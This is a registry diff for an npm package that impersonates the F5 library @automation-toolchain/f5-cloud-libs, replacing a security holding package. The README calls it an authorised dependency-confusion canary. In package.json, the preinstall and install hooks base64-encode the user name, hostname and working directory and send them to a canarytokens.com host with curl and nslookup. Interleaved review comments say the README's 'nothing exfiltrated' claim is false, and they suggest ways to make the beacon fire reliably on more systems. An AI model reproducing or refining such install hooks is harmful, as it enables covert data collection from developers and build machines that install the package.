@automation-toolchain/f5-cloud-libs 0.0.1-security → 4.29.0-2037287d

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release: this version of @automation-toolchain/f5-cloud-libs might be problematic.

Files changed (3)
  1. package/README.md +20 -3
  2. package/index.js +3 -0
  3. package/package.json +10 -3
package/README.md CHANGED
@@ -1,5 +1,22 @@
- # Security holding package
+ # @automation-toolchain/f5-cloud-libs — Authorised Security Research Canary
 
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
+ This package is a **dependency-confusion proof-of-concept** published as part of an authorised HackerOne security engagement against F5 Networks.
 
- Please refer to www.npmjs.com/advisories?search=%40automation-toolchain%2Ff5-cloud-libs for more information.
+ - Program: F5 HackerOne (https://hackerone.com/f5)
+ - Researcher: `m0chan` (https://hackerone.com/m0chan)
+ - Scope: F5 public source repositories reference `@automation-toolchain/f5-cloud-libs` via an `.npmrc` that uses an unset environment variable, causing npm to fall back to the public registry.
+
+ ## What this package does
+ On `preinstall` / `install` it issues a single HTTP GET and a single DNS lookup to a Canarytokens.com canary, recording:
+ - `whoami`
+ - `hostname`
+ - working directory
+ - package name requested
+
+ No files are read, written, exfiltrated, or executed beyond the canary beacon. There is no runtime code, no persistence, no network traffic outside the beacon.
+
+ ## Contact
+ If this package has installed unintentionally in your environment, please contact F5 Networks Security (security@f5.com) and reference the HackerOne report filed by `m0chan`. The package will be unpublished once triage is complete.
+
+ ## Remediation
+ F5 should claim the `@automation-toolchain` scope on npmjs.org and replace the env-var-based `.npmrc` with a hard-coded internal registry URL or fail-closed configuration.
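
Review bot: the beacon count in `On preinstall / install it issues a single HTTP GET and a single DNS lookup` is wrong for this release: package.json in the same diff puts the identical `curl` plus `nslookup` command in both the `preinstall` and `install` hooks, so a normal install fires two GETs and two lookups. The next claim, `No files are read, written, exfiltrated, or executed beyond the canary beacon`, also contradicts the list right above it: `whoami`, `hostname` and the working directory are base64-encoded into a URL and sent to canarytokens.com, a third-party host, which is data leaving the target however limited the fields are. Suggest stating plainly which identifiers are transmitted and to whom, and pasting the exact script so a reader can verify the scope instead of trusting the summary. In the Remediation section, show the concrete `.npmrc` line F5 is being asked to adopt (a scoped binding of the form `@automation-toolchain:registry=<internal URL>` is the least-privilege form, since it pins just this scope) rather than describing the fix in prose, so the affected team can apply it without guessing.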
package/index.js ADDED
@@ -0,0 +1,3 @@
+ // Authorised F5 HackerOne dependency-confusion PoC.
+ // This package exists solely as a canary. No runtime payload.
+ module.exports = {};
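
Review bot: `module.exports = {}` silently replaces the real f5-cloud-libs API with an empty object, so a build that resolves this package and gets as far as `require()` does not fail here but later, when something it expected is `undefined`, with an error that points nowhere near the cause. Since this is the only JavaScript in the package, the two header comments should also say where the beacon actually lives (the `preinstall`/`install` scripts in package.json), otherwise a reader who opens index.js concludes the package is inert. If the goal is to make the misconfiguration visible to the affected team, `throw new Error('dependency-confusion canary, see HackerOne report by m0chan')` is a more useful export than `{}`, because it fails loudly at the first `require` with a message naming the report.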
package/package.json CHANGED
@@ -1,6 +1,13 @@
  {
  "name": "@automation-toolchain/f5-cloud-libs",
- "version": "0.0.1-security",
- "description": "security holding package",
- "repository": "npm/security-holder"
+ "version": "4.29.0-2037287d",
+ "description": "Authorised F5 HackerOne dependency-confusion PoC — canary only, no payload. Contact: m0chan@hackerone.",
+ "main": "index.js",
+ "scripts": {
+ "preinstall": "b64=$(echo \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgb64=$(echo \"$npm_package_name\" | base64 -w0); curl http://canarytokens.com/mbf5httr3k3m1n1p2igwpgons/$npm_package_name/$b64; nslookup $pkgb64.mbf5httr3k3m1n1p2igwpgons.canarytokens.com",
+ "install": "b64=$(echo \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgb64=$(echo \"$npm_package_name\" | base64 -w0); curl http://canarytokens.com/mbf5httr3k3m1n1p2igwpgons/$npm_package_name/$b64; nslookup $pkgb64.mbf5httr3k3m1n1p2igwpgons.canarytokens.com"
+ },
+ "keywords": [],
+ "author": "",
+ "license": "ISC"
  }
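
Review bot: the `preinstall` and `install` scripts are byte-for-byte identical, so the beacon fires twice per install; keep `preinstall` (npm runs it first) and drop `install`. The command is also not portable: `base64 -w0` is a GNU coreutils flag that the macOS/BSD `base64` rejects, and `nslookup` is missing from many minimal CI images, so on those hosts the script exits non-zero and npm aborts the whole install, which turns a canary into an outage for the affected team and can hide the confusion because the install never completes. Make both commands non-fatal (`curl -s -m 5 ... || true`, `nslookup ... || true`) and use an encoding that exists everywhere, e.g. `openssl base64 -A`. Smaller items in the same hunk: `"description"` ends with a truncated contact `m0chan@hackerone.`; `"author"` is empty although the README names the researcher; the beacon goes over plain `http://`; and the `-2037287d` suffix makes `4.29.0-2037287d` a semver prerelease, which `^4.29.0`-style ranges will not match, so it is only reached through the `latest` dist-tag or an exact pin, a detail the README's scope section should state.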